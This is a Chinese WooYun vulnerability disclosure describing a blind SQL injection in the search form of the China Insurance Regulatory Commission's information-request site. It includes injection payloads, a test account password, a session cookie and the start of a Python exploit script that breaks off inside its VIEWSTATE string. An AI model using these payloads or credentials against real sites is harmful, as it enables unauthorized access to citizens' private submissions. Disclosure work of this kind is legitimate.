当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133642

漏洞标题:中国某部委主网站SQL盲注(有详细思路,带自写脚本)

相关厂商:中国保监会

漏洞作者: Zacker

提交时间:2015-08-14 16:54

修复时间:2015-09-28 17:56

公开时间:2015-09-28 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经确认,细节仅向厂商公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开

简要描述:

以前不是走小厂商就是被忽略,这回来个国家部级的。。
这个SQL盲注不是简单地用sqlmap就搞定的,是一个multipart/form-data POST盲注,而且还带着巨型的VIEWSTATE字段,详细说明里我会具体描述漏洞利用的全过程。
其实不是为了拿rank,就是做个知识库积累。

详细说明:

0x00 前言
本人刚开始学习渗透不到半年,各方面知识还比较浅薄,如果哪个白帽大大发现问题(肯定会有很多问题。。),请一定告诉我!谢谢。
我现在在一个央企做信息安全管理工作,渗透其实不是主要工作内容,周围的同事也没有对渗透感兴趣的,所以我都是自学,也没有什么机会能和志同道合的兄弟交流,很寂寞。望与各位白帽大大结识,共同发展共同提高。
0x01 漏洞发现过程
先上URL:http://www.circ.gov.cn/tabid/5272/Default.aspx
这是一个申请保监会公开政府信息的功能界面,要查看需要先注册一个账号,注册过程省略。(我的账号:penetest1 密码:penetest,审核大大可以用这个,已经有数据了,而且下面的脚本也是针对这个账号已有的数据)
注册后可以查看自己提出申请的审核情况。默认这个页面是没有审核情况表的,因为你还没提出过申请(废话)。
申请后可以看到如下图页面(PS:保监会的公务员叔叔,有垃圾数据了抱歉,为了测试需要嘛):

Snip20150812_6.png


上面的搜索栏可以对申请内容进行匹配。一般这种地方都有可能有sql注入点,那么我们来试一下,输入“'-- ”,看看输出是不是正常。发现的确正常输出结果了。

Snip20150812_5.png


那么我想,能不能查看所有用户申请内容呢?试着输入“ ' or 1=1-- ”。

Snip20150812_7.png


至此,可以确定存在sql注入点了。(好像有人实名举报保监会某某某。。我是不是看到不该看的东西了)
0x02 漏洞利用过程
发现sql注入点很容易,但是想利用就费劲了。
那么我们来用union试着查询一下其他数据吧。先用“' union select 1,2,3,4....”试一下查询的列数,结果我都试到二十多列了,一直在报错(我是有多坚定- -!),这个看来不行,那就试着用“' order by n”来测列数吧,发现order by 1是正常的,order by 2就不行了,难道只查询了一列??不知道,怎么试都不行,算了。。
那我们来盲注吧~
首先需要判断数据库类型。输入“1'+'2%'-- ”,发现与输入“12%'-- ”的输出结果是一样的。可知是用的MSSQL(注:为啥要加一个%呢?因为通过尝试发现这个参数是放在like语句中的,原sql查询语句大概是这个样子的:select a,b,c,d,e,f from db.table where d like '%输入%' and userid = 'xx' and bulabula...如果不加%的话,匹配的是“%12”,其中12是作为结尾的,自然没有匹配的记录)(再注:其实看到aspx页面大概百分之80是用的MSSQL了,是吧?)

Snip20150812_8.png


再来看数据库版本,输入“%' and substring((select @@version),22,4)=2008-- ”,返回正常结果,说明用的是sqlserver2008。(这个是试出来的,可以用大于小于号试)

Snip20150812_9.png


同理,可得知当前数据库用户名长度为14。(下面脚本里要用到的)

Snip20150812_10.png


当前数据库名长度为4。

Snip20150812_11.png


PS:除了内容描述那里,两个申请日期那里也是sql注入点。
好了,现在可以尝试用自动化脚本进行暴库了。
0x03 写脚本
写脚本的过程真的让人很郁闷,其实是很简单的逻辑,但是因为一些小细节,绕了很大弯路。
首先,用burp看一下http请求的结构。。。

Snip20150812_13.png


我靠这是传说中的VIEWSTATE么,这么大一坨,看来是没法用sqlmap了。(如果有大大会用sqlmap做multipart/form-data POST盲注,请留言。。)
不怕,用python写个脚本呗。为了缩短POST请求,用burp repeater测试出哪些head参数、COOKIE、和POST参数是没用的,在脚本里面删掉。(这个决定是个深坑,我因此绕了一个大弯路)
最后试出来有用的内容有:Content-Type、.EASYSITE55(cookie)、那个一大坨VIEWSTATE(POST)和ess$ctr24437$bjh_Menu$txtNeedOtherInfo(POST参数,也就是我们的注入点)。我这里用的判断指纹是我的申请内容“union”,已经提前检查过了,其他地方没有匹配到这个字符串。
把我们的必要请求内容放到字符串里,用urllib2库发送请求。

resp = urllib2.urlopen(req,timeout=5)


Wireshark抓包结果如下:

Snip20150812_14.png


坑爹啊,malformed packet是个毛啊,看得我整个人都不好了。检查了半个小时,才发现标准的http包换行是用的“\r\n”,而我用的是“\n”。。。以后要注意了。
改过再来,OK,这回可以看到返回的包了。

Snip20150812_15.png


可是。。我之后改了ess$ctr24437$bjh_Menu$txtNeedOtherInfo注入点的内容,返回的结果一直都是一样的,就算我查询的是fuck之类不好的字眼,还是能正常返回申请的数据。。这是什么鬼?!
后来我重新检查了POST参数和VIEWSTATE解码后的内容,发现VIEWSTATE里面有一些很有意思的内容啊!

Snip20150812_2.png


Snip20150812_3.png


这不是sql查询语句么。。不知道为啥会写在VIEWSTATE里。
后来终于在绝望地尝试中发现,我之前删POST参数删多了,ess$ctr24437$bjh_Menu$ibtnSearch.x、ess$ctr24437$bjh_Menu$ibtnSearch.y和ess$ctr24437$bjh_Menu$hidType这三个货被我删掉之后,返回的结果永远都是VIEWSTATE里面那个语句的查询结果。。。
好了,终于写好脚本了!
0x04 脚本运行结果
因为一大坨VIEWSTATE的缘故,脚本内容太长了,所以我先把脚本运行结果放上来。

Snip20150812_4.png


这个脚本可以自己输入想要查询的内容,user_name()啊,db_name()啊,之类的。
脚本使用注意:
cookie请自己替换成新的。。(废话)
提前用len()试出来长度,要修改range里面的值。
0x05 脚本

#!/usr/bin/python
#encoding:utf-8
import urllib2
import sys
mycookie = ".EASYSITE55=AEE337C01D32D34A9E1B34ADC54FCCF9A2A9CF08C7D5D9F09ECA5DA49E26CC6A2FC277A3710981B9AC49C8CFFE06A51C31CEA418592509926CB0C5D29307FBF165546531920B0C6610AA64D0C6F43CC1" #cookie请自行更新
viewstate = """/wEPDwUJNjcwNjk2ODMxD2QWBmYPFgIeBFRleHQFeTwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj5kAgEPZBYQAgUPFgIeB1Zpc2libGVoZAIGDxYCHgdjb250ZW50BRLmlL/lupzkv6Hmga/lhazlvIBkAgcPFgIfAgUf5pS/5bqc5L+h5oGv5YWs5byALEVhc3lTaXRlLEVTU2QCCA8WAh8CBTlDb3B5cmlnaHQgMjAxMSBieSBIdWlsYW4gSW5mb3JtYXRpb24gVGVjaG5vbG9neSBDby4sIEx0ZC5kAgkPFgIfAgUJRWFzeVNpdGUgZAIKDxYCHwIFIeS4reWbveS/nemZqeebkeedo+euoeeQhuWnlOWRmOS8mmQCDQ8WAh8CBQ1JTkRFWCwgRk9MTE9XZAIRDxYCHglpbm5lcmh0bWwFvg8uZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1iY3RyIHtib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7ICBiYWNrZ3JvdW5kLWNvbG9yOiBUcmFuc3BhcmVudDt9DQouZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1iYXIge2N1cnNvcjogcG9pbnRlcjsgY3Vyc29yOiBoYW5kOyBoZWlnaHQ6MDt9DQouZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1pdG0ge2N1cnNvcjogcG9pbnRlcjsgY3Vyc29yOiBoYW5kOyBjb2xvcjogVHJhbnNwYXJlbnQ7IGZvbnQtc2l6ZTogMTJwdDsgZm9udC13ZWlnaHQ6IG5vcm1hbDsgZm9udC1zdHlsZTogbm9ybWFsOyBib3JkZXItbGVmdDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkOyBib3JkZXItYm90dG9tOiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJvcmRlci10b3A6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7fQ0KLmVzc19lc3NtZW51X2N0bGVzc21lbnVfc3BtaWNuIHtjdXJzb3I6IHBvaW50ZXI7IGN1cnNvcjogaGFuZDsgYmFja2dyb3VuZC1jb2xvcjogVHJhbnNwYXJlbnQ7IGJvcmRlci1sZWZ0OiBUcmFuc3BhcmVudCAxcHggc29saWQ7IGJvcmRlci1ib3R0b206IFRyYW5zcGFyZW50IDFweCBzb2xpZDsgYm9yZGVyLXRvcDogVHJhbnNwYXJlbnQgMXB4IHNvbGlkOyB0ZXh0LWFsaWduOiBjZW50ZXI7IHdpZHRoOiA1O2hlaWdodDogMDtkaXNwbGF5Om5vbmU7fQ0KLmVzc19lc3NtZW51X2N0bGVzc21lbnVfc3Btc3ViIHt6LWluZGV4OiAxMDAwOyBjdXJzb3I6IHBvaW50ZXI7IGN1cnNvcjogaGFuZDsgYmFja2dyb3VuZC1jb2xvcjogVHJhbnNwYXJlbnQ7IGZpbHRlcjpwcm9naWQ6RFhJbWFnZVRyYW5zZm9ybS5NaWNyb3NvZnQuU2hhZG93KGNvbG9yPSdEaW1HcmF5JywgRGlyZWN0aW9uPTEzNSwgU3RyZW5ndGg9MykgO2JvcmRlci1ib3R0b206IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLWxlZnQ6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXRvcDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkOyBib3JkZXItcmlnaHQ6IFRyYW5zcGFyZW50IDBweCBzb2xpZDt9DQouZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1icmsge2JvcmRlci1ib3R0b206IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLWxlZnQ6IFRyYW5zcGFyZW50IDBweCBzb2xpZDsgYm9yZGVyLXRvcDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkOyAgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAwcHggc29saWQ7IGJhY2tncm91bmQtY29sb3I6IFdoaXRlOyBoZWlnaHQ6IDBweDt9DQouZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1pdG1zZWwge2JhY2tncm91bmQtY29sb3I6IFRyYW5zcGFyZW50OyBjdXJzb3I6IHBvaW50ZXI7IGN1cnNvcjogaGFuZDsgY29sb3I6IFRyYW5zcGFyZW50OyBmb250LXNpemU6IDEycHQ7IGZvbnQtd2VpZ2h0OiBub3JtYWw7IGZvbnQtc3R5bGU6IG5vcm1hbDt9DQouZXNzX2Vzc21lbnVfY3RsZXNzbWVudV9zcG1hcncge2ZvbnQtZmFtaWx5OiB3ZWJkaW5nczsgZm9udC1zaXplOiAxMHB0OyBjdXJzb3I6IHBvaW50ZXI7IGN1cnNvcjogaGFuZDsgYm9yZGVyLXJpZ2h0OiBUcmFuc3BhcmVudCAxcHggc29saWQ7IGJvcmRlci1ib3R0b206IFRyYW5zcGFyZW50IDFweCBzb2xpZDsgYm9yZGVyLXRvcDogVHJhbnNwYXJlbnQgMHB4IHNvbGlkOyBkaXNwbGF5Om5vbmU7fQ0KLmVzc19lc3NtZW51X2N0bGVzc21lbnVfc3BtcmFydyB7Zm9udC1mYW1pbHk6IHdlYmRpbmdzOyBmb250LXNpemU6IDEwcHQ7IGN1cnNvcjogcG9pbnRlcjsgY3Vyc29yOiBoYW5kO30NCi5lc3NfZXNzbWVudV9jdGxlc3NtZW51X3NwbWl0bXNjciB7d2lkdGg6IDEwMCU7IGZvbnQtc2l6ZTogNnB0O30NCmQCAg9kFgICAQ9kFgZmD2QWAmYPFgIfAWgWBAIBD2QWAgIDDxBkZBYAZAIDD2QWBGYPFCsAAhQrAAIPFgYeDVNlbGVjdGVkSW5kZXhmHgRTa2luBQdEZWZhdWx0HhNFbmFibGVFbWJlZGRlZFNraW5zaGQQFgZmAgECAgIDAgQCBRYGFCsAAmRkFCsAAmRkFCsAAmRkFCsAAmRkFCsAAg8WAh8BaGRkFCsAAg8WAh8BaGRkDxYGZmZmZmZmFgEFblRlbGVyaWsuV2ViLlVJLlJhZFRhYiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMS4xLjUxOS4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2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